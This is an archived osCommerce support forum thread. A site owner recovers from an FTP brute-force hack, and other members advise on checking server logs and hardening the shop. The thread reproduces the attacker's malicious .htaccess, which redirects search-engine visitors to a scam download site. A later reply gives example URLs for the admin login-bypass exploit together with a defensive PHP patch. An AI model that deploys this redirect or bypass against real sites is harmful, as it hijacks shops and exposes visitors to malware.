Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacked .httaccess changed


johnnybebad

Recommended Posts

Hi one of mu sites were hacked yesterday, I had an email today about it.

 

it appears that they have changed the httaccess file to whats below, the link at the bottom takes you to one of those dodgy download sites saying you have virus on your pc.

 

The question is how do i find out where they got in and xclose the hole?

 

I have replaced the file and the site appears to be working normally, and I cant find any other issues.

 

Please can someone advise asap, merry christmas folks.

 

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*g?oog?le\.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://frigo.info/hvac/temp.php [R,L]

 

Thanks

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

Johnny,

 

 

If your site has an admin/file_manager.php and/or an admin/define_languages.php file, it is open to hackers.

 

If your site still has the admin directory named admin, it is open to hackers.

 

If your site does not have the security fixes mentioned in these threads (Admin Security Website Security), it is open to hackers.

 

If your site does not have the 5 'Must Have' security contributions, it is open to hackers.

 

If you have not located and removed the malicious code and anomalous files from the previous hack, it is STILL OPEN TO HACKERS.

 

 

 

Chris

Link to comment
Share on other sites

Hi,

 

I have most if not all the secuirty mods installed.

 

I have done some checking and its posible they cross scrippted through http_error.php which i highlighted before, I say this because its a file that I have had corrected and thougtht I had updated all the sites but it appears that it I had the unaltered file on this account.

 

However I need to find out for sure where they got in so i can check.

 

File manager and define languages dont exist and admin has a different name completly different, front of shop affected not admin as far as I can tell, admin appears to be unaffected.

 

I can retest the account data not a problems but I need to make sure that i have plugged the hole or whatever i do is pointless.

 

Not my site is checked by macaffee the software updated and transfered to all my sites (or at leasdt i think it is) all security holes i find out about are corrected as soon as possible, when i am alerted by a scan.

 

The question is i need to finmd out where they got in so i can go back and check everything.

 

I can not find any other altered files at the moment and i am doing what i can.

 

Thanks

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

The server logs contain a record of all site activity.

 

Not easy to look thru, but if you know what file(s) were altered or the approximate time it makes it easier.

 

In this case you do know at least one file that was changed.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

The server logs contain a record of all site activity.

 

Not easy to look thru, but if you know what file(s) were altered or the approximate time it makes it easier.

 

In this case you do know at least one file that was changed.

 

 

I can narrow the time down to 24-48 hours...lol maybe even closer, where are the erver logs kept, I will have a loook.

 

Thanks

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

Only you or your host can answer that question.

 

You'll want to pay close attention to any log entry that contain POST

 

A partial log entry from the site I manage:

 

xxx.xxx.xxx.xxx - - [26/Dec/2010:11:22:52 -0500] "POST /login.php?action=process HTTP/1.1"

 

If they hijacked a file or form about the only way to overwrite something is with a POST.

 

See what files people have been POST-ing to.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Only you or your host can answer that question.

 

You'll want to pay close attention to any log entry that contain POST

 

A partial log entry from the site I manage:

 

xxx.xxx.xxx.xxx - - [26/Dec/2010:11:22:52 -0500] "POST /login.php?action=process HTTP/1.1"

 

If they hijacked a file or form about the only way to overwrite something is with a POST.

 

See what files people have been POST-ing to.

 

 

I have been told it was a Brute forced from the subnet 217.23.10.0 /24 and they have complained if that was the case i would have thought there would be more accounts hacked on the server.

 

Trying to get more info.

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

Hi,

 

I have accessed my logs but they appear to be for the last 24 hours only and no POST, all are GET attempts have been made at all with 24 hours, I would need to go further back to find the hack attempt.

 

Hope to hear more from the company thats hosts my server to find out how they came to there conclusion or whether they were generalising, just there explanation runs a bit thin with me as to bruce force my passwords on ftp should be a little more difficult that just trying numbers and letters etc.

 

running hack attempt scans now to see if my main site is okay and if so thenj maybe I will try and set up an acount for the other accounts and check themj out.

 

Thanks

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

If you look at the date time of none of the infected files, you can look at your logs for that date time.

 

Don't forget, often the logs have a different time the server time.

 

You can find the difference by logging on and accessing a few pages and look in the log for the time. Then create a file and see the date time.

 

Not much use if you have deleted all the infected files.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Hi was hiacked by brute force attempt on ftp details on christmas eve, not very festive.

 

basically some of the accounts had deafult ftp accounts setup which is the same as control panel access.

 

now the default gives x number of characters out which happen to be the first part of the domain name. so all they had to do was brute force, many combinations of the passwo9rd until they get the green light and leave a little mess.

 

I have made sure all the accounts on the server are not so straight forward now and the default ftp has been removed, ie username cant be first number x chracters of the domain name.Also setup up brute force protection so large attempts at accessing the ftp with different paswords locks them out.

 

lesson learned, thankfully they didnt make much of a mess, but to make sure redoing all accounts, and re-installing there settings just to be safe.

 

Remember don't get sloppy

 

Thanks for everyones help, merry crimbo and a happy new year hacker free hopefully

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

Hi was hiacked by brute force attempt on ftp details on christmas eve, not very festive.

 

basically some of the accounts had deafult ftp accounts setup which is the same as control panel access.

 

now the default gives x number of characters out which happen to be the first part of the domain name. so all they had to do was brute force, many combinations of the passwo9rd until they get the green light and leave a little mess.

 

I have made sure all the accounts on the server are not so straight forward now and the default ftp has been removed, ie username cant be first number x chracters of the domain name.Also setup up brute force protection so large attempts at accessing the ftp with different paswords locks them out.

 

lesson learned, thankfully they didnt make much of a mess, but to make sure redoing all accounts, and re-installing there settings just to be safe.

 

Remember don't get sloppy

 

PS it didnt show up as a hack risk before or afterwards, be warned.

 

Thanks for everyones help, merry crimbo and a happy new year hacker free hopefully

Getting better with mods but no programmer am I.

Link to comment
Share on other sites

  • 1 month later...

If the admin application_top is not patched then they would not even need to brute force anything. Since an attacker can easily upload files into a writeable folder, all they do is upload a shell script which gives them the ability to read files at least. At which point they read the contents of the config file where the database username and password (thanks to cpanel) are usually not that far from the ftp login or even the cpanel username and password.

 

Changing the admin folder name works ok as a getaround, unless some plugin gives the admin folder location away, and some of them do. For instance using a smiley in the fckeditor will give away the admin location.

 

examples:

/admin/administrators.php/login.php?action=new

/admin/categories.php/login.php?action=new

 

If your admin is unprotected by htaccess or not renamed then anyone with a web browser can use a URL made of those two in order to get straight into your admin area and do whatever they want.

 

Putting htaccess permissions on the admin folder is the next best place to start.

 

If your webhost does not allow htaccess, then add this somewhere near the top of your application_top.php file in /admin/includes/

 

      if(stristr($_SERVER['REQUEST_URI'],'.php/login')) {
                 die(); //do something, up to you what
     }

 

This will put pay to attackers using requests that append the login.php file to admin files in order to circumvent admin permissions.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...